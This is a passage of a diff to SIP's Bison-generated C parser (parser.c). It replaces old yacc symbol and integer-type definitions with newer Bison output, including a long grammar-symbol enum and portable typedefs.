TK_TRAVERSECODE */ ++ YYSYMBOL_TK_CLEARCODE = 39, /* TK_CLEARCODE */ ++ YYSYMBOL_TK_GETBUFFERCODE = 40, /* TK_GETBUFFERCODE */ ++ YYSYMBOL_TK_RELEASEBUFFERCODE = 41, /* TK_RELEASEBUFFERCODE */ ++ YYSYMBOL_TK_READBUFFERCODE = 42, /* TK_READBUFFERCODE */ ++ YYSYMBOL_TK_WRITEBUFFERCODE = 43, /* TK_WRITEBUFFERCODE */ ++ YYSYMBOL_TK_SEGCOUNTCODE = 44, /* TK_SEGCOUNTCODE */ ++ YYSYMBOL_TK_CHARBUFFERCODE = 45, /* TK_CHARBUFFERCODE */ ++ YYSYMBOL_TK_PICKLECODE = 46, /* TK_PICKLECODE */ ++ YYSYMBOL_TK_VIRTUALCALLCODE = 47, /* TK_VIRTUALCALLCODE */ ++ YYSYMBOL_TK_METHODCODE = 48, /* TK_METHODCODE */ ++ YYSYMBOL_TK_PREMETHODCODE = 49, /* TK_PREMETHODCODE */ ++ YYSYMBOL_TK_INSTANCECODE = 50, /* TK_INSTANCECODE */ ++ YYSYMBOL_TK_FROMTYPE = 51, /* TK_FROMTYPE */ ++ YYSYMBOL_TK_TOTYPE = 52, /* TK_TOTYPE */ ++ YYSYMBOL_TK_TOSUBCLASS = 53, /* TK_TOSUBCLASS */ ++ YYSYMBOL_TK_INCLUDE = 54, /* TK_INCLUDE */ ++ YYSYMBOL_TK_OPTINCLUDE = 55, /* TK_OPTINCLUDE */ ++ YYSYMBOL_TK_IMPORT = 56, /* TK_IMPORT */ ++ YYSYMBOL_TK_EXPHEADERCODE = 57, /* TK_EXPHEADERCODE */ ++ YYSYMBOL_TK_MODHEADERCODE = 58, /* TK_MODHEADERCODE */ ++ YYSYMBOL_TK_TYPEHEADERCODE = 59, /* TK_TYPEHEADERCODE */ ++ YYSYMBOL_TK_MODULE = 60, /* TK_MODULE */ ++ YYSYMBOL_TK_CMODULE = 61, /* TK_CMODULE */ ++ YYSYMBOL_TK_CONSMODULE = 62, /* TK_CONSMODULE */ ++ YYSYMBOL_TK_COMPOMODULE = 63, /* TK_COMPOMODULE */ ++ YYSYMBOL_TK_CLASS = 64, /* TK_CLASS */ ++ YYSYMBOL_TK_STRUCT = 65, /* TK_STRUCT */ ++ YYSYMBOL_TK_PUBLIC = 66, /* TK_PUBLIC */ ++ YYSYMBOL_TK_PROTECTED = 67, /* TK_PROTECTED */ ++ YYSYMBOL_TK_PRIVATE = 68, /* TK_PRIVATE */ ++ YYSYMBOL_TK_SIGNALS = 69, /* TK_SIGNALS */ ++ YYSYMBOL_TK_SIGNAL_METHOD = 70, /* TK_SIGNAL_METHOD */ ++ YYSYMBOL_TK_SLOTS = 71, /* TK_SLOTS */ ++ YYSYMBOL_TK_SLOT_METHOD = 72, /* TK_SLOT_METHOD */ ++ YYSYMBOL_TK_BOOL = 73, /* TK_BOOL */ ++ YYSYMBOL_TK_SHORT = 74, /* TK_SHORT */ ++ YYSYMBOL_TK_INT = 75, /* TK_INT */ ++ YYSYMBOL_TK_LONG = 76, /* TK_LONG */ ++ YYSYMBOL_TK_FLOAT = 77, /* TK_FLOAT */ ++ 
YYSYMBOL_TK_DOUBLE = 78, /* TK_DOUBLE */ ++ YYSYMBOL_TK_CHAR = 79, /* TK_CHAR */ ++ YYSYMBOL_TK_WCHAR_T = 80, /* TK_WCHAR_T */ ++ YYSYMBOL_TK_VOID = 81, /* TK_VOID */ ++ YYSYMBOL_TK_PYOBJECT = 82, /* TK_PYOBJECT */ ++ YYSYMBOL_TK_PYTUPLE = 83, /* TK_PYTUPLE */ ++ YYSYMBOL_TK_PYLIST = 84, /* TK_PYLIST */ ++ YYSYMBOL_TK_PYDICT = 85, /* TK_PYDICT */ ++ YYSYMBOL_TK_PYCALLABLE = 86, /* TK_PYCALLABLE */ ++ YYSYMBOL_TK_PYSLICE = 87, /* TK_PYSLICE */ ++ YYSYMBOL_TK_PYTYPE = 88, /* TK_PYTYPE */ ++ YYSYMBOL_TK_PYBUFFER = 89, /* TK_PYBUFFER */ ++ YYSYMBOL_TK_VIRTUAL = 90, /* TK_VIRTUAL */ ++ YYSYMBOL_TK_ENUM = 91, /* TK_ENUM */ ++ YYSYMBOL_TK_SIGNED = 92, /* TK_SIGNED */ ++ YYSYMBOL_TK_UNSIGNED = 93, /* TK_UNSIGNED */ ++ YYSYMBOL_TK_SCOPE = 94, /* TK_SCOPE */ ++ YYSYMBOL_TK_LOGICAL_OR = 95, /* TK_LOGICAL_OR */ ++ YYSYMBOL_TK_CONST = 96, /* TK_CONST */ ++ YYSYMBOL_TK_STATIC = 97, /* TK_STATIC */ ++ YYSYMBOL_TK_SIPSIGNAL = 98, /* TK_SIPSIGNAL */ ++ YYSYMBOL_TK_SIPSLOT = 99, /* TK_SIPSLOT */ ++ YYSYMBOL_TK_SIPANYSLOT = 100, /* TK_SIPANYSLOT */ ++ YYSYMBOL_TK_SIPRXCON = 101, /* TK_SIPRXCON */ ++ YYSYMBOL_TK_SIPRXDIS = 102, /* TK_SIPRXDIS */ ++ YYSYMBOL_TK_SIPSLOTCON = 103, /* TK_SIPSLOTCON */ ++ YYSYMBOL_TK_SIPSLOTDIS = 104, /* TK_SIPSLOTDIS */ ++ YYSYMBOL_TK_SIPSSIZET = 105, /* TK_SIPSSIZET */ ++ YYSYMBOL_TK_SIZET = 106, /* TK_SIZET */ ++ YYSYMBOL_TK_NUMBER_VALUE = 107, /* TK_NUMBER_VALUE */ ++ YYSYMBOL_TK_REAL_VALUE = 108, /* TK_REAL_VALUE */ ++ YYSYMBOL_TK_TYPEDEF = 109, /* TK_TYPEDEF */ ++ YYSYMBOL_TK_NAMESPACE = 110, /* TK_NAMESPACE */ ++ YYSYMBOL_TK_TIMELINE = 111, /* TK_TIMELINE */ ++ YYSYMBOL_TK_PLATFORMS = 112, /* TK_PLATFORMS */ ++ YYSYMBOL_TK_FEATURE = 113, /* TK_FEATURE */ ++ YYSYMBOL_TK_LICENSE = 114, /* TK_LICENSE */ ++ YYSYMBOL_TK_QCHAR_VALUE = 115, /* TK_QCHAR_VALUE */ ++ YYSYMBOL_TK_TRUE_VALUE = 116, /* TK_TRUE_VALUE */ ++ YYSYMBOL_TK_FALSE_VALUE = 117, /* TK_FALSE_VALUE */ ++ YYSYMBOL_TK_NULL_VALUE = 118, /* TK_NULL_VALUE */ ++ YYSYMBOL_TK_OPERATOR = 119, /* 
TK_OPERATOR */ ++ YYSYMBOL_TK_THROW = 120, /* TK_THROW */ ++ YYSYMBOL_TK_QOBJECT = 121, /* TK_QOBJECT */ ++ YYSYMBOL_TK_EXCEPTION = 122, /* TK_EXCEPTION */ ++ YYSYMBOL_TK_RAISECODE = 123, /* TK_RAISECODE */ ++ YYSYMBOL_TK_EXPLICIT = 124, /* TK_EXPLICIT */ ++ YYSYMBOL_TK_TEMPLATE = 125, /* TK_TEMPLATE */ ++ YYSYMBOL_TK_FINAL = 126, /* TK_FINAL */ ++ YYSYMBOL_TK_ELLIPSIS = 127, /* TK_ELLIPSIS */ ++ YYSYMBOL_TK_DEFMETATYPE = 128, /* TK_DEFMETATYPE */ ++ YYSYMBOL_TK_DEFSUPERTYPE = 129, /* TK_DEFSUPERTYPE */ ++ YYSYMBOL_TK_PROPERTY = 130, /* TK_PROPERTY */ ++ YYSYMBOL_TK_HIDE_NS = 131, /* TK_HIDE_NS */ ++ YYSYMBOL_TK_FORMAT = 132, /* TK_FORMAT */ ++ YYSYMBOL_TK_GET = 133, /* TK_GET */ ++ YYSYMBOL_TK_ID = 134, /* TK_ID */ ++ YYSYMBOL_TK_KWARGS = 135, /* TK_KWARGS */ ++ YYSYMBOL_TK_LANGUAGE = 136, /* TK_LANGUAGE */ ++ YYSYMBOL_TK_LICENSEE = 137, /* TK_LICENSEE */ ++ YYSYMBOL_TK_NAME = 138, /* TK_NAME */ ++ YYSYMBOL_TK_OPTIONAL = 139, /* TK_OPTIONAL */ ++ YYSYMBOL_TK_ORDER = 140, /* TK_ORDER */ ++ YYSYMBOL_TK_REMOVELEADING = 141, /* TK_REMOVELEADING */ ++ YYSYMBOL_TK_SET = 142, /* TK_SET */ ++ YYSYMBOL_TK_SIGNATURE = 143, /* TK_SIGNATURE */ ++ YYSYMBOL_TK_TIMESTAMP = 144, /* TK_TIMESTAMP */ ++ YYSYMBOL_TK_TYPE = 145, /* TK_TYPE */ ++ YYSYMBOL_TK_USEARGNAMES = 146, /* TK_USEARGNAMES */ ++ YYSYMBOL_TK_PYSSIZETCLEAN = 147, /* TK_PYSSIZETCLEAN */ ++ YYSYMBOL_TK_USELIMITEDAPI = 148, /* TK_USELIMITEDAPI */ ++ YYSYMBOL_TK_ALLRAISEPYEXC = 149, /* TK_ALLRAISEPYEXC */ ++ YYSYMBOL_TK_CALLSUPERINIT = 150, /* TK_CALLSUPERINIT */ ++ YYSYMBOL_TK_DEFERRORHANDLER = 151, /* TK_DEFERRORHANDLER */ ++ YYSYMBOL_TK_VERSION = 152, /* TK_VERSION */ ++ YYSYMBOL_153_ = 153, /* '(' */ ++ YYSYMBOL_154_ = 154, /* ')' */ ++ YYSYMBOL_155_ = 155, /* ',' */ ++ YYSYMBOL_156_ = 156, /* '=' */ ++ YYSYMBOL_157_ = 157, /* '{' */ ++ YYSYMBOL_158_ = 158, /* '}' */ ++ YYSYMBOL_159_ = 159, /* ';' */ ++ YYSYMBOL_160_ = 160, /* '!' 
*/ ++ YYSYMBOL_161_ = 161, /* '-' */ ++ YYSYMBOL_162_ = 162, /* '+' */ ++ YYSYMBOL_163_ = 163, /* '*' */ ++ YYSYMBOL_164_ = 164, /* '/' */ ++ YYSYMBOL_165_ = 165, /* '&' */ ++ YYSYMBOL_166_ = 166, /* '|' */ ++ YYSYMBOL_167_ = 167, /* '~' */ ++ YYSYMBOL_168_ = 168, /* '<' */ ++ YYSYMBOL_169_ = 169, /* '>' */ ++ YYSYMBOL_170_ = 170, /* ':' */ ++ YYSYMBOL_171_ = 171, /* '[' */ ++ YYSYMBOL_172_ = 172, /* ']' */ ++ YYSYMBOL_173_ = 173, /* '%' */ ++ YYSYMBOL_174_ = 174, /* '^' */ ++ YYSYMBOL_YYACCEPT = 175, /* $accept */ ++ YYSYMBOL_specification = 176, /* specification */ ++ YYSYMBOL_statement = 177, /* statement */ ++ YYSYMBOL_178_1 = 178, /* $@1 */ ++ YYSYMBOL_modstatement = 179, /* modstatement */ ++ YYSYMBOL_nsstatement = 180, /* nsstatement */ ++ YYSYMBOL_defdocstringfmt = 181, /* defdocstringfmt */ ++ YYSYMBOL_defdocstringfmt_args = 182, /* defdocstringfmt_args */ ++ YYSYMBOL_defdocstringfmt_arg_list = 183, /* defdocstringfmt_arg_list */ ++ YYSYMBOL_defdocstringfmt_arg = 184, /* defdocstringfmt_arg */ ++ YYSYMBOL_defdocstringsig = 185, /* defdocstringsig */ ++ YYSYMBOL_defdocstringsig_args = 186, /* defdocstringsig_args */ ++ YYSYMBOL_defdocstringsig_arg_list = 187, /* defdocstringsig_arg_list */ ++ YYSYMBOL_defdocstringsig_arg = 188, /* defdocstringsig_arg */ ++ YYSYMBOL_defencoding = 189, /* defencoding */ ++ YYSYMBOL_defencoding_args = 190, /* defencoding_args */ ++ YYSYMBOL_defencoding_arg_list = 191, /* defencoding_arg_list */ ++ YYSYMBOL_defencoding_arg = 192, /* defencoding_arg */ ++ YYSYMBOL_plugin = 193, /* plugin */ ++ YYSYMBOL_plugin_args = 194, /* plugin_args */ ++ YYSYMBOL_plugin_arg_list = 195, /* plugin_arg_list */ ++ YYSYMBOL_plugin_arg = 196, /* plugin_arg */ ++ YYSYMBOL_virterrorhandler = 197, /* virterrorhandler */ ++ YYSYMBOL_veh_args = 198, /* veh_args */ ++ YYSYMBOL_veh_arg_list = 199, /* veh_arg_list */ ++ YYSYMBOL_veh_arg = 200, /* veh_arg */ ++ YYSYMBOL_api = 201, /* api */ ++ YYSYMBOL_api_args = 202, /* api_args */ ++ 
YYSYMBOL_api_arg_list = 203, /* api_arg_list */ ++ YYSYMBOL_api_arg = 204, /* api_arg */ ++ YYSYMBOL_exception = 205, /* exception */ ++ YYSYMBOL_baseexception = 206, /* baseexception */ ++ YYSYMBOL_exception_body = 207, /* exception_body */ ++ YYSYMBOL_exception_body_directives = 208, /* exception_body_directives */ ++ YYSYMBOL_exception_body_directive = 209, /* exception_body_directive */ ++ YYSYMBOL_raisecode = 210, /* raisecode */ ++ YYSYMBOL_mappedtype = 211, /* mappedtype */ ++ YYSYMBOL_212_2 = 212, /* $@2 */ ++ YYSYMBOL_mappedtypetmpl = 213, /* mappedtypetmpl */ ++ YYSYMBOL_214_3 = 214, /* $@3 */ ++ YYSYMBOL_mtdefinition = 215, /* mtdefinition */ ++ YYSYMBOL_mtbody = 216, /* mtbody */ ++ YYSYMBOL_mtline = 217, /* mtline */ ++ YYSYMBOL_mtfunction = 218, /* mtfunction */ ++ YYSYMBOL_namespace = 219, /* namespace */ ++ YYSYMBOL_220_4 = 220, /* $@4 */ ++ YYSYMBOL_optnsbody = 221, /* optnsbody */ ++ YYSYMBOL_nsbody = 222, /* nsbody */ ++ YYSYMBOL_platforms = 223, /* platforms */ ++ YYSYMBOL_224_5 = 224, /* $@5 */ ++ YYSYMBOL_platformlist = 225, /* platformlist */ ++ YYSYMBOL_platform = 226, /* platform */ ++ YYSYMBOL_feature = 227, /* feature */ ++ YYSYMBOL_feature_args = 228, /* feature_args */ ++ YYSYMBOL_feature_arg_list = 229, /* feature_arg_list */ ++ YYSYMBOL_feature_arg = 230, /* feature_arg */ ++ YYSYMBOL_timeline = 231, /* timeline */ ++ YYSYMBOL_232_6 = 232, /* $@6 */ ++ YYSYMBOL_qualifierlist = 233, /* qualifierlist */ ++ YYSYMBOL_qualifiername = 234, /* qualifiername */ ++ YYSYMBOL_ifstart = 235, /* ifstart */ ++ YYSYMBOL_236_7 = 236, /* $@7 */ ++ YYSYMBOL_oredqualifiers = 237, /* oredqualifiers */ ++ YYSYMBOL_qualifiers = 238, /* qualifiers */ ++ YYSYMBOL_ifend = 239, /* ifend */ ++ YYSYMBOL_license = 240, /* license */ ++ YYSYMBOL_license_args = 241, /* license_args */ ++ YYSYMBOL_license_arg_list = 242, /* license_arg_list */ ++ YYSYMBOL_license_arg = 243, /* license_arg */ ++ YYSYMBOL_defmetatype = 244, /* defmetatype */ ++ 
YYSYMBOL_defmetatype_args = 245, /* defmetatype_args */ ++ YYSYMBOL_defmetatype_arg_list = 246, /* defmetatype_arg_list */ ++ YYSYMBOL_defmetatype_arg = 247, /* defmetatype_arg */ ++ YYSYMBOL_defsupertype = 248, /* defsupertype */ ++ YYSYMBOL_defsupertype_args = 249, /* defsupertype_args */ ++ YYSYMBOL_defsupertype_arg_list = 250, /* defsupertype_arg_list */ ++ YYSYMBOL_defsupertype_arg = 251, /* defsupertype_arg */ ++ YYSYMBOL_hiddenns = 252, /* hiddenns */ ++ YYSYMBOL_hiddenns_args = 253, /* hiddenns_args */ ++ YYSYMBOL_hiddenns_arg_list = 254, /* hiddenns_arg_list */ ++ YYSYMBOL_hiddenns_arg = 255, /* hiddenns_arg */ ++ YYSYMBOL_consmodule = 256, /* consmodule */ ++ YYSYMBOL_consmodule_args = 257, /* consmodule_args */ ++ YYSYMBOL_consmodule_arg_list = 258, /* consmodule_arg_list */ ++ YYSYMBOL_consmodule_arg = 259, /* consmodule_arg */ ++ YYSYMBOL_consmodule_body = 260, /* consmodule_body */ ++ YYSYMBOL_consmodule_body_directives = 261, /* consmodule_body_directives */ ++ YYSYMBOL_consmodule_body_directive = 262, /* consmodule_body_directive */ ++ YYSYMBOL_compmodule = 263, /* compmodule */ ++ YYSYMBOL_compmodule_args = 264, /* compmodule_args */ ++ YYSYMBOL_compmodule_arg_list = 265, /* compmodule_arg_list */ ++ YYSYMBOL_compmodule_arg = 266, /* compmodule_arg */ ++ YYSYMBOL_compmodule_body = 267, /* compmodule_body */ ++ YYSYMBOL_compmodule_body_directives = 268, /* compmodule_body_directives */ ++ YYSYMBOL_compmodule_body_directive = 269, /* compmodule_body_directive */ ++ YYSYMBOL_module = 270, /* module */ ++ YYSYMBOL_module_args = 271, /* module_args */ ++ YYSYMBOL_272_8 = 272, /* $@8 */ ++ YYSYMBOL_module_arg_list = 273, /* module_arg_list */ ++ YYSYMBOL_module_arg = 274, /* module_arg */ ++ YYSYMBOL_module_body = 275, /* module_body */ ++ YYSYMBOL_module_body_directives = 276, /* module_body_directives */ ++ YYSYMBOL_module_body_directive = 277, /* module_body_directive */ ++ YYSYMBOL_dottedname = 278, /* dottedname */ ++ YYSYMBOL_optnumber = 279, /* 
optnumber */ ++ YYSYMBOL_include = 280, /* include */ ++ YYSYMBOL_include_args = 281, /* include_args */ ++ YYSYMBOL_include_arg_list = 282, /* include_arg_list */ ++ YYSYMBOL_include_arg = 283, /* include_arg */ ++ YYSYMBOL_optinclude = 284, /* optinclude */ ++ YYSYMBOL_import = 285, /* import */ ++ YYSYMBOL_import_args = 286, /* import_args */ ++ YYSYMBOL_import_arg_list = 287, /* import_arg_list */ ++ YYSYMBOL_import_arg = 288, /* import_arg */ ++ YYSYMBOL_optaccesscode = 289, /* optaccesscode */ ++ YYSYMBOL_optgetcode = 290, /* optgetcode */ ++ YYSYMBOL_optsetcode = 291, /* optsetcode */ ++ YYSYMBOL_copying = 292, /* copying */ ++ YYSYMBOL_exphdrcode = 293, /* exphdrcode */ ++ YYSYMBOL_modhdrcode = 294, /* modhdrcode */ ++ YYSYMBOL_typehdrcode = 295, /* typehdrcode */ ++ YYSYMBOL_travcode = 296, /* travcode */ ++ YYSYMBOL_clearcode = 297, /* clearcode */ ++ YYSYMBOL_getbufcode = 298, /* getbufcode */ ++ YYSYMBOL_releasebufcode = 299, /* releasebufcode */ ++ YYSYMBOL_readbufcode = 300, /* readbufcode */ ++ YYSYMBOL_writebufcode = 301, /* writebufcode */ ++ YYSYMBOL_segcountcode = 302, /* segcountcode */ ++ YYSYMBOL_charbufcode = 303, /* charbufcode */ ++ YYSYMBOL_instancecode = 304, /* instancecode */ ++ YYSYMBOL_picklecode = 305, /* picklecode */ ++ YYSYMBOL_finalcode = 306, /* finalcode */ ++ YYSYMBOL_modcode = 307, /* modcode */ ++ YYSYMBOL_typecode = 308, /* typecode */ ++ YYSYMBOL_preinitcode = 309, /* preinitcode */ ++ YYSYMBOL_initcode = 310, /* initcode */ ++ YYSYMBOL_postinitcode = 311, /* postinitcode */ ++ YYSYMBOL_unitcode = 312, /* unitcode */ ++ YYSYMBOL_unitpostinccode = 313, /* unitpostinccode */ ++ YYSYMBOL_prepycode = 314, /* prepycode */ ++ YYSYMBOL_exptypehintcode = 315, /* exptypehintcode */ ++ YYSYMBOL_modtypehintcode = 316, /* modtypehintcode */ ++ YYSYMBOL_classtypehintcode = 317, /* classtypehintcode */ ++ YYSYMBOL_doc = 318, /* doc */ ++ YYSYMBOL_exporteddoc = 319, /* exporteddoc */ ++ YYSYMBOL_autopyname = 320, /* autopyname */ ++ 
YYSYMBOL_autopyname_args = 321, /* autopyname_args */ ++ YYSYMBOL_autopyname_arg_list = 322, /* autopyname_arg_list */ ++ YYSYMBOL_autopyname_arg = 323, /* autopyname_arg */ ++ YYSYMBOL_docstring = 324, /* docstring */ ++ YYSYMBOL_docstring_args = 325, /* docstring_args */ ++ YYSYMBOL_docstring_arg_list = 326, /* docstring_arg_list */ ++ YYSYMBOL_docstring_arg = 327, /* docstring_arg */ ++ YYSYMBOL_optdocstring = 328, /* optdocstring */ ++ YYSYMBOL_extract = 329, /* extract */ ++ YYSYMBOL_extract_args = 330, /* extract_args */ ++ YYSYMBOL_extract_arg_list = 331, /* extract_arg_list */ ++ YYSYMBOL_extract_arg = 332, /* extract_arg */ ++ YYSYMBOL_makefile = 333, /* makefile */ ++ YYSYMBOL_codeblock = 334, /* codeblock */ ++ YYSYMBOL_codelines = 335, /* codelines */ ++ YYSYMBOL_enum = 336, /* enum */ ++ YYSYMBOL_337_9 = 337, /* $@9 */ ++ YYSYMBOL_optenumkey = 338, /* optenumkey */ ++ YYSYMBOL_optfilename = 339, /* optfilename */ ++ YYSYMBOL_optname = 340, /* optname */ ++ YYSYMBOL_optenumbody = 341, /* optenumbody */ ++ YYSYMBOL_enumbody = 342, /* enumbody */ ++ YYSYMBOL_enumline = 343, /* enumline */ ++ YYSYMBOL_optcomma = 344, /* optcomma */ ++ YYSYMBOL_optenumassign = 345, /* optenumassign */ ++ YYSYMBOL_optassign = 346, /* optassign */ ++ YYSYMBOL_expr = 347, /* expr */ ++ YYSYMBOL_binop = 348, /* binop */ ++ YYSYMBOL_optunop = 349, /* optunop */ ++ YYSYMBOL_value = 350, /* value */ ++ YYSYMBOL_optcast = 351, /* optcast */ ++ YYSYMBOL_scopedname = 352, /* scopedname */ ++ YYSYMBOL_scopednamehead = 353, /* scopednamehead */ ++ YYSYMBOL_scopepart = 354, /* scopepart */ ++ YYSYMBOL_bool_value = 355, /* bool_value */ ++ YYSYMBOL_simplevalue = 356, /* simplevalue */ ++ YYSYMBOL_exprlist = 357, /* exprlist */ ++ YYSYMBOL_typedef = 358, /* typedef */ ++ YYSYMBOL_struct = 359, /* struct */ ++ YYSYMBOL_360_10 = 360, /* $@10 */ ++ YYSYMBOL_361_11 = 361, /* $@11 */ ++ YYSYMBOL_classtmpl = 362, /* classtmpl */ ++ YYSYMBOL_363_12 = 363, /* $@12 */ ++ YYSYMBOL_template = 364, 
/* template */ ++ YYSYMBOL_class = 365, /* class */ ++ YYSYMBOL_366_13 = 366, /* $@13 */ ++ YYSYMBOL_367_14 = 367, /* $@14 */ ++ YYSYMBOL_superclasses = 368, /* superclasses */ ++ YYSYMBOL_superlist = 369, /* superlist */ ++ YYSYMBOL_superclass = 370, /* superclass */ ++ YYSYMBOL_class_access = 371, /* class_access */ ++ YYSYMBOL_optclassbody = 372, /* optclassbody */ ++ YYSYMBOL_classbody = 373, /* classbody */ ++ YYSYMBOL_classline = 374, /* classline */ ++ YYSYMBOL_property = 375, /* property */ ++ YYSYMBOL_property_args = 376, /* property_args */ ++ YYSYMBOL_property_arg_list = 377, /* property_arg_list */ ++ YYSYMBOL_property_arg = 378, /* property_arg */ ++ YYSYMBOL_property_body = 379, /* property_body */ ++ YYSYMBOL_property_body_directives = 380, /* property_body_directives */ ++ YYSYMBOL_property_body_directive = 381, /* property_body_directive */ ++ YYSYMBOL_name_or_string = 382, /* name_or_string */ ++ YYSYMBOL_optslot = 383, /* optslot */ ++ YYSYMBOL_dtor = 384, /* dtor */ ++ YYSYMBOL_385_15 = 385, /* $@15 */ ++ YYSYMBOL_dtor_decl = 386, /* dtor_decl */ ++ YYSYMBOL_ctor = 387, /* ctor */ ++ YYSYMBOL_388_16 = 388, /* $@16 */ ++ YYSYMBOL_simplector = 389, /* simplector */ ++ YYSYMBOL_optctorsig = 390, /* optctorsig */ ++ YYSYMBOL_391_17 = 391, /* $@17 */ ++ YYSYMBOL_optsig = 392, /* optsig */ ++ YYSYMBOL_393_18 = 393, /* $@18 */ ++ YYSYMBOL_function = 394, /* function */ ++ YYSYMBOL_operatorname = 395, /* operatorname */ ++ YYSYMBOL_optconst = 396, /* optconst */ ++ YYSYMBOL_optfinal = 397, /* optfinal */ ++ YYSYMBOL_optabstract = 398, /* optabstract */ ++ YYSYMBOL_optflags = 399, /* optflags */ ++ YYSYMBOL_flaglist = 400, /* flaglist */ ++ YYSYMBOL_flag = 401, /* flag */ ++ YYSYMBOL_flagvalue = 402, /* flagvalue */ ++ YYSYMBOL_virtualcallcode = 403, /* virtualcallcode */ ++ YYSYMBOL_methodcode = 404, /* methodcode */ ++ YYSYMBOL_premethodcode = 405, /* premethodcode */ ++ YYSYMBOL_virtualcatchercode = 406, /* virtualcatchercode */ ++ YYSYMBOL_arglist = 
407, /* arglist */ ++ YYSYMBOL_rawarglist = 408, /* rawarglist */ ++ YYSYMBOL_argvalue = 409, /* argvalue */ ++ YYSYMBOL_varmember = 410, /* varmember */ ++ YYSYMBOL_411_19 = 411, /* $@19 */ ++ YYSYMBOL_412_20 = 412, /* $@20 */ ++ YYSYMBOL_simple_varmem = 413, /* simple_varmem */ ++ YYSYMBOL_414_21 = 414, /* $@21 */ ++ YYSYMBOL_varmem = 415, /* varmem */ ++ YYSYMBOL_member = 416, /* member */ ++ YYSYMBOL_417_22 = 417, /* $@22 */ ++ YYSYMBOL_variable = 418, /* variable */ ++ YYSYMBOL_variable_body = 419, /* variable_body */ ++ YYSYMBOL_variable_body_directives = 420, /* variable_body_directives */ ++ YYSYMBOL_variable_body_directive = 421, /* variable_body_directive */ ++ YYSYMBOL_cpptype = 422, /* cpptype */ ++ YYSYMBOL_argtype = 423, /* argtype */ ++ YYSYMBOL_optref = 424, /* optref */ ++ YYSYMBOL_deref = 425, /* deref */ ++ YYSYMBOL_basetype = 426, /* basetype */ ++ YYSYMBOL_cpptypelist = 427, /* cpptypelist */ ++ YYSYMBOL_optexceptions = 428, /* optexceptions */ ++ YYSYMBOL_exceptionlist = 429 /* exceptionlist */ ++}; ++typedef enum yysymbol_kind_t yysymbol_kind_t; + +-/* Copy the second part of user declarations. */ + + +-/* Line 216 of yacc.c. */ +-#line 639 "sip-4.19.23/sipgen/parser.c" + + #ifdef short + # undef short + #endif + +-#ifdef YYTYPE_UINT8 +-typedef YYTYPE_UINT8 yytype_uint8; +-#else +-typedef unsigned char yytype_uint8; ++/* On compilers that do not define __PTRDIFF_MAX__ etc., make sure ++ <limits.h> and (if available) <stdint.h> are included ++ so that the code can choose integer types of a good width. 
*/ ++ ++#ifndef __PTRDIFF_MAX__ ++# include <limits.h> /* INFRINGES ON USER NAME SPACE */ ++# if defined __STDC_VERSION__ && 199901 <= __STDC_VERSION__ ++# include <stdint.h> /* INFRINGES ON USER NAME SPACE */ ++# define YY_STDINT_H ++# endif + #endif + +-#ifdef YYTYPE_INT8 +-typedef YYTYPE_INT8 yytype_int8; +-#elif (defined __STDC__ || defined __C99__FUNC__ \ +- || defined __cplusplus || defined _MSC_VER) ++/* Narrow types that promote to a signed type and that can represent a ++ signed or unsigned integer of at least N bits. In tables they can ++ save space and decrease cache pressure. Promoting to a signed type ++ helps avoid bugs in integer arithmetic. */ ++ ++#ifdef __INT_LEAST8_MAX__ ++typedef __INT_LEAST8_TYPE__ yytype_int8; ++#elif defined YY_STDINT_H ++typedef int_least8_t yytype_int8; ++#else + typedef signed char yytype_int8; ++#endif ++ ++#ifdef __INT_LEAST16_MAX__ ++typedef __INT_LEAST16_TYPE__ yytype_int16; ++#elif defined YY_STDINT_H ++typedef int_least16_t yytype_int16; + #else +-typedef short int yytype_int8; ++typedef short yytype_int16; ++#endif ++ ++/* Work around bug in HP-UX 11.23, which defines these macros ++ incorrectly for preprocessor constants. This workaround can likely ++ be removed in 2023, as HPE has promised support for HP-UX 11.23 ++ (aka HP-UX 11i v2) only through the end of 2022; see Table 2 of ++ <https://h20195.www2.hpe.com/V2/getpdf.aspx/4AA4-7673ENW.pdf>. 
*/ ++#ifdef __hpux ++# undef UINT_LEAST8_MAX ++# undef UINT_LEAST16_MAX ++# define UINT_LEAST8_MAX 255 ++# define UINT_LEAST16_MAX 65535 + #endif + +-#ifdef YYTYPE_UINT16 +-typedef YYTYPE_UINT16 yytype_uint16; ++#if defined __UINT_LEAST8_MAX__ && __UINT_LEAST8_MAX__ <= __INT_MAX__ ++typedef __UINT_LEAST8_TYPE__ yytype_uint8; ++#elif (!defined __UINT_LEAST8_MAX__ && defined YY_STDINT_H \ ++ && UINT_LEAST8_MAX <= INT_MAX) ++typedef uint_least8_t yytype_uint8; ++#elif !defined __UINT_LEAST8_MAX__ && UCHAR_MAX <= INT_MAX ++typedef unsigned char yytype_uint8; + #else +-typedef unsigned short int yytype_uint16; ++typedef short yytype_uint8; + #endif + +-#ifdef YYTYPE_INT16 +-typedef YYTYPE_INT16 yytype_int16; ++#if defined __UINT_LEAST16_MAX__ && __UINT_LEAST16_MAX__ <= __INT_MAX__ ++typedef __UINT_LEAST16_TYPE__ yytype_uint16; ++#elif (!defined __UINT_LEAST16_MAX__ && defined YY_STDINT_H \ ++ && UINT_LEAST16_MAX <= INT_MAX) ++typedef uint_least16_t yytype_uint16; ++#elif !defined __UINT_LEAST16_MAX__ && USHRT_MAX <= INT_MAX ++typedef unsigned short yytype_uint16; + #else +-typedef short int yytype_int16; ++typedef int yytype_uint16; ++#endif ++ ++#ifndef YYPTRDIFF_T ++# if defined __PTRDIFF_TYPE__ && defined __PTRDIFF_MAX__ ++# define YYPTRDIFF_T __PTRDIFF_TYPE__ ++# define YYPTRDIFF_MAXIMUM __PTRDIFF_MAX__ ++# elif defined PTRDIFF_MAX ++# ifndef ptrdiff_t ++# include <stddef.h> /* INFRINGES ON USER NAME SPACE */ ++# endif ++# define YYPTRDIFF_T ptrdiff_t ++# define YYPTRDIFF_MAXIMUM PTRDIFF_MAX ++# else ++# define YYPTRDIFF_T long ++# define YYPTRDIFF_MAXIMUM LONG_MAX ++# endif + #endif + + #ifndef YYSIZE_T +@@ -673,55 +806,106 @@ typedef short int yytype_int16; + # define YYSIZE_T __SIZE_TYPE__ + # elif defined size_t + # define YYSIZE_T size_t +-# elif ! 
